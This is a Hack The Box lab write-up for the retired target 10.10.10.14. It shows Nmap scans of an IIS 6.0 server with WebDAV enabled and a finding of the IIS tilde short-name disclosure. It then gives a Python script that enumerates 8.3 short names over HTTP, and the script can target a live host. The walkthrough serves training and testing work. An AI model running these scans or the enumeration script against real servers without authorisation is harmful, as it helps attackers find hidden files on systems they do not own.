Nmap
┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ sudo nmap -AO -p- $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-07 17:44 CEST
Nmap scan report for 10.10.10.14
Host is up (0.029s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Server Date: Fri, 07 Oct 2022 15:46:13 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (94%), BT embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_xp::sp1:professional cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_ce:5.0.1400 cpe:/h:btvision:btvision%2b_box
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (94%), Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (91%), Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   28.02 ms 10.10.14.1
2   28.22 ms 10.10.10.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.33 seconds
The Nmap scan returns a single open port, 80/tcp, running Microsoft IIS httpd 6.0, so the target is Microsoft Windows (IIS 6.0 ships with Windows Server 2003, which matches the OS guesses). The http-webdav-scan output also shows WebDAV enabled: PUT, DELETE, MOVE and MKCOL appear under Public Options, although the Allowed Methods for the root only include COPY, PROPFIND, SEARCH, LOCK and UNLOCK, so write access, if any, would have to be confirmed per directory.
Performing an additional scan with Nmap's IIS-specific NSE scripts (http-iis-*).
┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ nmap --script http-iis-* -p80 $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-07 17:49 CEST
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 50.00% done; ETC: 17:51 (0:01:04 remaining)
Nmap scan report for 10.10.10.14
Host is up (0.029s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-iis-short-name-brute:
|   VULNERABLE:
|   Microsoft IIS tilde character "~" short name disclosure and denial of service
|     State: VULNERABLE (Exploitable)
|       Vulnerable IIS servers disclose folder and file names with a Windows 8.3 naming scheme inside the root folder.
|       Shortnames can be used to guess or brute force sensitive filenames. Attackers can exploit this vulnerability to
|       cause a denial of service condition.
|
|     Extra information:
|
|   8.3 filenames found:
|     Folders
|       aspnet~1
|     Files
|       postin~1.htm
|
|     References:
|       http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
|       https://github.com/irsdl/IIS-ShortName-Scanner
|_      https://www.securityfocus.com/archive/1/523424
|_http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=<path>
Nmap done: 1 IP address (1 host up) scanned in 72.91 seconds
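The http-iis-short-name-brute result above (folder aspnet~1, file postin~1.htm) comes from a yes/no oracle: IIS 6.0 answers a request such as /a*~1*/.aspx with 404 when a file or folder in the web root matches the 8.3 wildcard and 400 when nothing does, so short names can be recovered one character at a time. The script below is an added example, not the writeup's, Nmap's or IIS-ShortName-Scanner's code. Its HTTP oracle assumes that IIS 6 status behaviour (the one described in the Soroush Dalili paper the scan cites); the offline oracle and the two sample names are constructed so the walk runs without a target.

```python
"""IIS 8.3 short-name enumeration, the technique behind http-iis-short-name-brute.

Added example for this writeup; it is not code from the page, from Nmap, or from
IIS-ShortName-Scanner. Assumption: on IIS 6.0 a request for /<pattern>/.aspx is
answered 404 when some file or folder matches the 8.3 wildcard pattern and 400
otherwise. Only long names that do not fit 8.3 get a ~N short name at all.
"""
import fnmatch
import string
import sys
import urllib.error
import urllib.request

CHARSET = string.ascii_lowercase + string.digits + "_-"
MAX_STEM = 6  # an 8.3 short name keeps at most 6 characters before ~N
MAX_EXT = 3


def http_oracle(base_url, timeout=5):
    """exists(pattern) backed by a live host; base_url such as http://10.10.10.14."""
    def exists(pattern):
        url = f"{base_url.rstrip('/')}/{pattern}/.aspx"
        req = urllib.request.Request(url, method="GET")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                code = resp.status
        except urllib.error.HTTPError as err:
            code = err.code
        return code == 404  # 400 Bad Request means nothing matched (assumed IIS 6 behaviour)
    return exists


def fake_iis_oracle(short_names):
    """Offline stand-in: constructed 8.3 names, matched the way the server would."""
    names = [n.upper() for n in short_names]

    def exists(pattern):
        return any(fnmatch.fnmatchcase(n, pattern.upper()) for n in names)
    return exists


def enumerate_shortnames(exists, charset=CHARSET, max_tilde=2):
    """Depth-first walk of the 8.3 name space; returns sorted 'stem~N.ext' / 'stem~N/'."""
    found = []

    def walk_ext(stem, ext):
        if ext and exists(f"{stem}.{ext}"):  # exact match, no wildcard: extension complete
            found.append(f"{stem}.{ext}")
            return
        if len(ext) == MAX_EXT:
            return
        for c in charset:
            if exists(f"{stem}.{ext}{c}*"):
                walk_ext(stem, ext + c)

    def walk_stem(prefix):
        if prefix:
            # collisions on the same stem get ~1, ~2, ... so try each index
            for n in range(1, max_tilde + 1):
                stem = f"{prefix}~{n}"
                if not exists(f"{stem}*"):
                    continue
                if exists(stem):  # matches with no extension: a folder (or extensionless file)
                    found.append(f"{stem}/")
                if exists(f"{stem}.*"):
                    walk_ext(stem, "")
        if len(prefix) == MAX_STEM:
            return
        for c in charset:
            # wildcard between prefix and tilde asks "does any short name start like this?"
            if any(exists(f"{prefix}{c}*~{n}*") for n in range(1, max_tilde + 1)):
                walk_stem(prefix + c)

    walk_stem("")
    return sorted(found)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    # constructed sample names mirror the two entries the scan found
    oracle = http_oracle(target) if target else fake_iis_oracle(["aspnet~1", "postin~1.htm"])
    for name in enumerate_shortnames(oracle):
        print(name)
```

Run with a base URL to query a real host, or without arguments to walk the constructed names. The walk is what makes this useful beyond the scan result: a file such as index.htm has no ~N form and stays invisible to the technique, while two long names sharing the first six characters surface as ~1 and ~2, which is why more than one tilde index is tried. Each oracle call is one HTTP request, so a real run costs roughly the charset size per recovered character.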